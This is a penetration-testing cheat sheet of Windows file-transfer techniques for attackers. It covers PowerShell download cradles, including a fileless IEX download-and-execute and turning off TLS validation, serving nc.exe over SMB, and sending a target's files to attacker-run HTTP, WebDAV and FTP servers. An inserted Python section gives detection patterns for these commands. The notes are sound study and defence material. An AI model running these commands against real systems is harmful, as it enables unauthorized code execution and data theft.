# Windows File Transfer

## Transfer File to Target Machine

### **PowerShell Base64 Encode & Decode**

```bash
# Pwnbox Check SSH Key MD5 Hash
md5sum id_rsa

# Pwnbox Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# Copy the output, paste it into a Windows PowerShell terminal, and decode it with PowerShell functions
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1C----0tLQo="))

# We can confirm if the file was transferred successfully using the Get-FileHash cmdlet, which does the same thing that md5sum does.
PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
```

### **PowerShell Web Downloads**

```bash
------------------- PowerShell DownloadFile Method ---------------------

PS C:\> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('https://URL','C:\PATH')

PS C:\> # Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://URL', 'filename.ps1')

---------------- PowerShell DownloadString - Fileless Method ----------------

PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://URL')

--------------------- PowerShell Invoke-WebRequest -----------------------

# You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.
PS C:\> Invoke-WebRequest https://URL/PowerView.ps1 -OutFile PowerView.ps1

# If PowerShell reports that the Internet Explorer first-launch configuration has not been completed, the parameter -UseBasicParsing bypasses the error.
PS C:\> Invoke-WebRequest https://<ip>/ -UseBasicParsing | IEX

# Another error relates to the SSL/TLS secure channel when the certificate is not trusted.
# The line below accepts any certificate, which turns off certificate validation for every later request in the same session.
PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```
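
For defenders, the PowerShell one-liners in the Base64 and Web Downloads sections above leave recognizable text in PowerShell script block logging (event ID 4104). The following is an added example, not part of the original notes: a small Python triage pass over constructed `ScriptBlockText` samples. The rule names, the `RecordId` key and the sample events are assumptions made for illustration.

```python
import re

# One case-insensitive pattern per technique shown in the sections above (rule names are illustrative).
RULES = {
    "webclient_download": re.compile(r"\.Download(String|File)(Async)?\s*\(", re.I),
    "invoke_webrequest": re.compile(
        r"(?<![\w.-])(Invoke-WebRequest|iwr|curl|wget)\b[^|;\n]*\bhttps?://", re.I),
    "in_memory_exec": re.compile(r"(?<![\w-])(IEX|Invoke-Expression)\b", re.I),
    "tls_validation_off": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "base64_to_disk": re.compile(r"WriteAllBytes\s*\(.*FromBase64String", re.I | re.S),
}
DOWNLOAD_RULES = {"webclient_download", "invoke_webrequest"}

def classify(script_text):
    """Return the sorted rule names that match one script block's text."""
    hits = {name for name, rx in RULES.items() if rx.search(script_text)}
    # A download and IEX in the same block is the fileless pattern shown above.
    if "in_memory_exec" in hits and hits & DOWNLOAD_RULES:
        hits.add("fileless_cradle")
    return sorted(hits)

def triage(events):
    """Map record id -> findings for every event with at least one hit."""
    report = {}
    for ev in events:
        findings = classify(ev["ScriptBlockText"])
        if findings:
            report[ev["RecordId"]] = findings
    return report

# Constructed sample events, not real logs; 192.0.2.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText":
        "(New-Object Net.WebClient).DownloadFile('https://192.0.2.10/a.ps1','C:\\Users\\Public\\a.ps1')"},
    {"RecordId": 2, "ScriptBlockText":
        "iex (new-object net.webclient).downloadstring('http://192.0.2.10/b.ps1')"},
    {"RecordId": 3, "ScriptBlockText":
        "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"},
    {"RecordId": 4, "ScriptBlockText":
        "[IO.File]::WriteAllBytes('C:\\Users\\Public\\id_rsa', [Convert]::FromBase64String($b))"},
    {"RecordId": 5, "ScriptBlockText":
        "Invoke-WebRequest https://192.0.2.10/ -UseBasicParsing | IEX"},
    {"RecordId": 6, "ScriptBlockText": "Get-FileHash C:\\Users\\Public\\id_rsa -Algorithm md5"},
]

if __name__ == "__main__":
    for rid, findings in triage(SAMPLE_EVENTS).items():
        print(rid, findings)
```

The patterns match on literal text only, so they are a starting point for triage rather than a complete detection: a `WebClient` object stored in a variable still matches on the method call, but string concatenation or encoded commands need the decoded script block.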

### SMB Downloads

```bash
---- without user/pass
# Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
smbserver.py a -smb2support .
 
# Copy a File from the SMB Server
C:\> copy \\<ip>\share\nc.exe

---- with user/pass
# Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
smbserver.py a -smb2support . -username tt -password tt

# Mount the SMB Server with Username and Password
C:\> net use n: \\<ip>\share /user:test test

# Other useful commands
net use \\<ip>\share /u:df df # to connect
copy file \\<ip>\share\ # to copy a file
del file 
net use /d \\<ip>\share # to delete the share  

# Note: You can also mount the SMB server if you receive an error when you use `copy filename \\IP\sharename`.
```

### FTP Downloads

```bash
# Installing the FTP Server Python3 Module - pyftpdlib
sudo pip3 install pyftpdlib

# Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21

# Transferring Files from an FTP Server Using PowerShell
PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://<ip>/file.txt', 'ftp-file.txt')

# If we do not have an interactive shell, we can create an FTP command file to download a file.
# Create a Command File for the FTP Client and Download the Target File
---
C:\> echo open <ip> > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open <ip>
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye
---
```

## Get File from target host to our attack machine

### **PowerShell Base64 Encode & Decode**

```bash
# Encode File Using PowerShell
PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

# Decode Base64 String in Linux
echo IyBDb3B5cmlnaH-----3N0DQo= | base64 -d > hosts
md5sum hosts
```

### **PowerShell Web Uploads**

```bash
# Installing a Configured WebServer with Upload
pip3 install uploadserver
# Start an upload server
python3 -m uploadserver

----------- PowerShell Script to Upload a File to Python Upload Server -------
# PSUpload.ps1 : https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1
PS C:\> Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Windows\System32\drivers\etc\hosts

---------------------- PowerShell Base64 Web Upload -----------------------

PS C:\> $b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

# Start a listener on the attack host to catch the Base64-encoded data from the target machine, then decode it
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts
```

### SMB Uploads

```bash
# Installing WebDav Python modules
sudo pip install wsgidav cheroot

# Using the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

# Connecting to the Webdav Share
C:\> dir \\<ip>\DavWWWRoot

# Uploading Files using SMB
C:\> copy C:\Users\user\Desktop\SourceCode.zip \\<ip>\DavWWWRoot\
```

### FTP Uploads

```bash
# We need to specify the --write option to allow clients to upload files to our attack host.
sudo python3 -m pyftpdlib --port 21 --write

# Use the PowerShell upload function to upload a file to our FTP server.
PS C:\> (New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

# Create a Command File for the FTP Client to Upload a File
---
C:\> echo open <ip> > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open <ip>

Log in with USER and PASS first.

ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
---
```

